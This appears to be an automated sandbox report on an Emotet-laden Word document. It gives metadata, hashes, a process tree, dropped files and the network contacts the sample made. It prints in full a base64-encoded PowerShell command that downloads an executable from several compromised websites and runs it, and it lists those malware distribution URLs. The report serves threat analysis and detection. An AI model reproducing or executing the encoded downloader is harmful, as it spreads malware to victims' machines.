File name: | INF_70647_2028252.doc |
Full analysis: | https://app.any.run/tasks/69a7354d-74cb-429f-bfb4-5f46518b671a |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 24, 2019, 19:59:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: mindshare Light Frozen, Subject: Ports, Author: Madison West, Comments: Gorgeous, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 14:58:00 2019, Last Saved Time/Date: Fri May 24 14:58:00 2019, Number of Pages: 1, Number of Words: 17, Number of Characters: 97, Security: 0 |
MD5: | 0CEF7243A9F55DF076105FAFA59077B6 |
SHA1: | 662FB0A3D6FC5A175C57D3C05B00FF0B41CB8DDD |
SHA256: | 6AFBD0A58C059546933C99F50E1D3E850A35CA9441F6AC2D98FDF8FB96B9EAF3 |
SSDEEP: | 3072:a77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qB+vCmhGip1pl4Q:a77HUUUUUUUUUUUUUUUUUUUT52V+NmhD |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserTypeLen: | 32 |
---|---|
CompObjUserType: | Microsoft Word 97-2003 Document |
Title: | mindshare Light Frozen |
Subject: | Ports |
Author: | Madison West |
Keywords: | - |
Comments: | Gorgeous |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:05:24 13:58:00 |
ModifyDate: | 2019:05:24 13:58:00 |
Pages: | 1 |
Words: | 17 |
Characters: | 97 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Rowe and Sons |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 113 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Hackett |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3708 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\INF_70647_2028252.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2616 | powershell -nop -e JABwAEEAVwAzAF8AdwBKAGoAPQAnAEUAWABMAGIAdwB3AG0AJwA7ACQASAA3AFMAdgBVAHAAIAA9ACAAJwA0ADQAMQAnADsAJAB0ADgAdgBGAHIAawBuAFEAPQAnAFgAMwA2AHMAegBTAGMAbgAnADsAJABaAHAAQwBwADgAaQBCAEgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgANwBTAHYAVQBwACsAJwAuAGUAeABlACcAOwAkAGEAWAB6AG4AQwBJAD0AJwBHAGgASgA0AEgASQAwADEAJwA7ACQAbQBEAEcAawBGAEYAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQBgAFQALgBXAGUAYgBgAEMATABpAEUAYABOAHQAOwAkAHEAYgB6AE4ATQB3AHcAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAGEAaQBzAG8AbgBtAGEAbgBvAHIALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB1AG4AUgBwAEYAWQBDAHcARgBmAC8AQABoAHQAdABwADoALwAvADQAZwBzAHQAYQByAHQAdQBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdwBvAHQAZAByAG4AUABHAC8AQABoAHQAdABwADoALwAvAGIAbwBuAGUAcwBwAGUAYwBpAGEAbABpAHMAdABzAGkAbgBtAGEAbgBnAGEAbABvAHIAZQAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBlAGgAYgBpAG0AOQBxAF8AcQBnAHIAZQA1AG0AYwBqAGYAOQAtADYAOQA2ADAAOAAvAEAAaAB0AHQAcAA6AC8ALwBoAG8AbgBkAGEAdABoAHUAZABvAC4AYwBvAG0ALwB3AHAALQBzAG4AYQBwAHMAaABvAHQAcwAvAGMAbgB3AG4AdwBzAHEAaABfADUANQBjADkAcQAtADkAMgA4ADcANAA2AC8AQABoAHQAdABwADoALwAvAGIAZQB0AGEAYgBhAG4AZwBsAGEAZABlAHMAaAAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AMgA0AHQAaABmAHMAdgBvAHkAXwB0AHkAMABpAHgAaABtAC0ANQA5AC8AJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAEoAWgBKADUAMQBzAD0AJwBZAGQAbQBqAFQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbAB3AGgAMgBpAG0AIABpAG4AIAAkAHEAYgB6AE4ATQB3AHcAKQB7AHQAcgB5AHsAJABtAEQARwBrAEYARgAuAEQAbwB3AG4AbABPAEEARABGAGkAbABFACgAJABsAHcAaAAyAGkAbQAsACAAJABaAHAAQwBwADgAaQBCAEgAKQA7ACQAUABpAEkASQBDAGkAPQAnAEgATgB6AGoAdQB3AHQAXwAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAFoAcABDAHAAOABpAEIASAApAC4ATABlAG4ARwB0AGgAIAAtAGcAZQAgADIAMAA4ADAAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AEEAcgBUACgAJABaAHAAQwBwADgAaQBCAEgAKQA7ACQATgBIAG0AaQBHAHAAegA9ACcARgBsAE8ASwBIADEAMQAnADsAYgByAGUAYQBrADsAJABGAE8AbgA0AFAAdgBtADUAPQAnAGoAdgBuAGkASABoAGYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAdwBDAGQATgA1ADkAegBoAD0AJwBXADYAOABPAFIANwA4ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3F8D.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2616 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AN5POP70IA3SWCT0PW4V.temp | — | |
MD5:— | SHA256:— | |||
3708 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\INF_70647_2028252.doc.LNK | lnk | |
MD5:CA6995F62DD8B17743CD8EF9AA5CC8B1 | SHA256:0354C135D3630E6DE346B9EC18C5DB18D1C69B72209445722E3D22765CCE7F55 | |||
3708 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:78854943818252C6E83A83506E030BA5 | SHA256:70605DF163FEFE0262A4C8EC5FEA5164CDA9B34A06150B7FAA60DE41EEFE53B8 | |||
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0FEAB0A.wmf | wmf | |
MD5:95B5BED7F2DADDF367D636778CE3C9E5 | SHA256:90325BBA44EEACA0DDB89CE8E0792505CD7EE37A788AF61B9D4080E8D7006ECD | |||
3708 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:C55125751F7C6D1BCD0F4954FA03BCBC | SHA256:5EFBD0D813F184B8A16B94BBC8097CF11CF8C76B0731147C0A39E92B149BA547 | |||
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A7C91E9C.wmf | wmf | |
MD5:C2E94C04DB721DABCC157FCE170096EC | SHA256:798AFAFBA42A36BABF7FF4C798AC94637FE6ECA2AE47EEF0FDAD1E9CDC8F4F6C | |||
3708 | WINWORD.EXE | C:\Users\admin\Downloads\~$F_70647_2028252.doc | pgc | |
MD5:D83D4FF30910E23991056DFEF81962F9 | SHA256:BF51C66E000F21975A329D186B78204421885A233310A0E888B5B5B4CEA49D9F | |||
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FB812EDE.wmf | wmf | |
MD5:184A881C43C32297F194764ABBAA2B8C | SHA256:EE2B30A208BB5BA80AA9B0E90656FBA7F997B360627D06F45EBFE03CBC66296C | |||
3708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4A4B5ED.wmf | wmf | |
MD5:BCF860AEBF2005A184DE42A7AA1EDD60 | SHA256:A417C3F918B8FE0AF0AF8CD6F68CC58DBBF93785A01D1924EA32353C329713AB |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2616 | powershell.exe | GET | 404 | 107.180.14.26:80 | http://bonespecialistsinmangalore.com/images/ehbim9q_qgre5mcjf9-69608/ | US | xml | 345 b | malicious |
2616 | powershell.exe | GET | 404 | 27.254.81.83:80 | http://4gstartup.com/wp-content/wotdrnPG/ | TH | xml | 345 b | malicious |
2616 | powershell.exe | GET | 404 | 138.197.32.141:80 | http://www.maisonmanor.com/wp-content/unRpFYCwFf/ | US | xml | 345 b | suspicious |
2616 | powershell.exe | GET | 404 | 103.101.162.43:80 | http://hondathudo.com/wp-snapshots/cnwnwsqh_55c9q-928746/ | unknown | xml | 345 b | unknown |
2616 | powershell.exe | GET | 404 | 192.3.2.170:80 | http://betabangladesh.com/wp-includes/24thfsvoy_ty0ixhm-59/ | US | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2616 | powershell.exe | 138.197.32.141:80 | www.maisonmanor.com | Digital Ocean, Inc. | US | suspicious |
2616 | powershell.exe | 107.180.14.26:80 | bonespecialistsinmangalore.com | GoDaddy.com, LLC | US | malicious |
2616 | powershell.exe | 103.101.162.43:80 | hondathudo.com | — | — | unknown |
2616 | powershell.exe | 27.254.81.83:80 | 4gstartup.com | CS LOXINFO Public Company Limited. | TH | malicious |
2616 | powershell.exe | 192.3.2.170:80 | betabangladesh.com | ColoCrossing | US | malicious |
Domain | IP | Reputation |
---|---|---|
www.maisonmanor.com |
| suspicious |
4gstartup.com |
| malicious |
bonespecialistsinmangalore.com |
| malicious |
hondathudo.com |
| unknown |
betabangladesh.com |
| malicious |